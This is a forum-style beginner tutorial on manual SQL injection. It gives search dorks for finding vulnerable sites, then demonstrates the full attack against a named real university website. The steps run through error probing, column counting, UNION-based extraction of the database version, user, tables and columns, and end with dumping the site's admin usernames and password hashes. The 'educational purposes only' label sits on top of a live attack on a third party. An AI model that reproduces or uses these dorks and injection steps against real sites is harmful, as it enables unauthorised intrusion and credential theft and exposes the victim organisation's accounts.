Another Manual Sql tutorial

Hacking a Website"
Method: Basic SQL Injection Tutorial (Manual)
Status: Beginners
For educational purposes only.. smile emoticon
Step 1: Find a website that is vulnerable to the attack.
Try this in google:
site:.kr "inurl:index.php?id="
site:.kr "inurl:news.php?id="
inurl:php?id=
(in is for indian site but you can change it to other countries) :sleepy:
For example:
http://website.com.cn/index.php?id=5
I got one sample vuln for you:
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…
Step 2:
Add a ' (apos) at the end of the URL. Such that the URL looks like
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…'
If the page returns an SQL error like what you can see now in the site then the page is vulnerable to SQL injection.
If it loads normally, leave the page and move on to the next site in the search result.
Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Step 3:
Enumerate the number of columns and those columns that are accepting the queries from you.
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…--
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…--
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…--
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…--
Continue until an error occurs. The highest number for which you do not get an error is the number of columns in the table.
Step 4:
Know the column numbers which are accepts queries.
For example from Step 3, you got 8 columns available, simply apply this:
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…--
(Please don't forget to put minus or hyphen after the "id=")
Now, it will show you some numbers. Those are the column numbers which accepts queries or should I say "the vulnerable columns".
So you got the numbers 2,3. You can inject in any of those numbers your SQL statements but I would like you to use the first number for good results. smile emoticon
Step 5:
Enumerating the Version of SQL
Replace the most vulnerable column with "@@version" or "verson().
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php… +select+1,@@version,3,4,5,6,7--
Result: 5.5.1-m2-log
If the site has a version higher than 5 then we are good to go. But if it is lower, we should have to follow some other ways because there is no database by default like "information_schema" which stores information about tables/columns of other databases in version less than 5. In this case, we are in.
Step 6:
Exploiting
To know the database in use:
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…(database()),3,4,5,6,7--
Result: Lishi-en
To get the current user:
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…(user()),3,4,5,6,7--
Result: Lishi@localhost
To get the list of tables, we will now insert the group_concat
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php… from information_schema.tables%20where%20table_schema=database()--
Results: Bigtype,contents,smalltype,users
To get the list of columns:
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php… from information_schema.columns where table_schema=database()--
Results:
Big_id,big_name,big_desc,big_width,c_id,c_title,c_content,c_big,c_small,c_time,c_sort,small_id,small_name,small_desc,small_big,u_id,u_name,u_pwd,u_question,u_answer,u_access
3
Step 7:
Extracting datas
Now our main objective is to look for the admin's username and password. Lets go for the nearest suspected tables and columns where we think contains the admin's username and password.
Suspected Tables:
users
Suspected Columns:
u_name, u_pwd
So lets extract them. smile emoticon \m/
http://mainpage.nwu.edu.cn/unit/ulsxy/english/content.php…
Results:
username:password
adminadmin:*514FC2971F3E94BB16F25C396219DFDF01D02443
nwuhistory:*FAB9E64D166DE9E99C07AB1A22808BF060BCCCE8